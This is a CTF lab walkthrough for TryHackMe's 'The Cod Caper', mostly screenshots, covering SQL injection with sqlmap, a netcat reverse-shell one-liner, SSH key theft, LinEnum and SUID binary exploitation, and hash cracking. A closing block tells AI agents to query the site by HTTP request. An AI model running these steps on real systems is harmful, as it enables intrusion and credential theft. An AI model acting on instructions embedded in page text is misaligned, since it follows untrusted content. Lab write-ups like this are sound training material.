# The Cod Caper ![](/files/-MeMqMSJqaPI58sY2oUS) ## Host Enumeration Lets run nmap scan to find open ports and the services running on them ![](/files/-MeMrDd60OfUrngdpSE5) ![](/files/-MeMrNhMe6UFnHkq1_t0) ## Web Enumeration Lets check the webpage. ![](/files/-MeMrZ4t8GIM0SkmrdVf) Its a default Apache2 page, lets run gobuster to find hidden files and directories ![](/files/-MeMuj6i5h99D5cOrMdC) ![](/files/-MeMung_24Sx9yqGMHNO) ## Web Exploitation Lets use Sqlmap to find more information. ![](/files/-MeMzSVOTEVebw_Ub7Nw) ![](/files/-MeMzXlQGgVNIJg-zszv) ![](/files/-MeMzfLg-YYOz4uLSGSX) ## Command Execution Lets check the administrator.php page and login with the credentials we found. ![](/files/-MeR0py4WxpOAIUcPCAt) Looks like we can run commands. Lets get a reverse shell on the machine, first we start a netcat listener. ![](/files/-MeR17ToqnfiDdRW8GTu) Now lets run the reverse shell command ``` rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 1234 >/tmp/f ``` ![](/files/-MeR1O1F3a9fVGJ674KA) We have a shell. Lets stabilize the shell. ![](/files/-MeR1oqKdN96cAn8hjSk) Lets look at how many files are in the current directory. ![](/files/-MeR25u6UVMwsx-5H-TL) ![](/files/-MeR2AJKypLGmCu87fjF) Lets check if pingu still has his account on this machine. ![](/files/-MeR2KkaO-ui0h8BxUJ-) Looks like he does. ![](/files/-MeR2OjXoBmSRVrDZfLj) Lets look for interesting files belonging to www-data. ![](/files/-MeR4FYLS756SDWgzXNg) ![](/files/-MeR4Kdmxx2mZguvhKO6) Lets look at this interesting file ![](/files/-MeR4TE969GIrQH8MAEZ) Looks like a password. ![](/files/-MeR4lAQnnsNryT0dVt2) Lets now go get the private ssh key of pingu. ![](/files/-MeR2wBlEh80QXbVrLov) Lets cat the contents of `id_rsa`*and copy it to our machine and call the file `id_rsa.`* Now lets set the permissions for the file and login with the password we found. ![](/files/-MeR4gX3UhU_PD-9rBZd) ## LinEnum ![](/files/-MeR5EOcbSX6sul2V2ok) Lets use the second method, first on our machine lets cd into the directory where the LinEnum file is located and then start a http server on port 8000 ![](/files/-MeR5WcNkeBbjNPvy_c-) Now lets go to the /tmp folder on the victim machine and download the file. ![](/files/-MeR5jQ7xpU-eCBfZNbl) Now lets give it executable permissions and run the file. ![](/files/-MeR6UuQLDsvEZLNyzmJ) Once we run the file we get a lot of information. Looking at the SUID files, we see an interesting one that is not common. ![](/files/-MeR6i3ku6E-X0d0UepQ) ![](/files/-MeR6odJHlWmdUEhYIz6) ## pwndbg ![](/files/-MeR7EcjZL7xDH4mKGnK) ![](/files/-MeR7YicRXN26MqfWIba) ![](/files/-MeR7nu3WxixF_Mc3eLE) ## Binary-Exploitation: Manually ![](/files/-MeR8BxeU5wOmjOzrMpY) ![](/files/-MeR8EpwT8BcSjZxZcnZ) ## Binary-Exploitation: The Pwntools way ![](/files/-MeR8iRh4BcRZO5hrLK2) ![](/files/-MeR8l_79HNYTA1yNR1r) ## Binary Exploitation Lets use the manual way Lets cd into the /opt/secret directory and run the command to get the hash of the root user ![](/files/-MeR988xC02mG5Gftgwm) ## Finishing The Job We have the hash, lets copy it and save it on our machine in a file called hash and lets crack it using hashcat. ![](/files/-MeR9rI5s1Yyji6_VjWb) ![](/files/-MeRB44mkAtUnBUbNUXz) We have the password. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://writeups.adityadindi.com/tryhackme/walkthroughs-easy/the-cod-caper.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.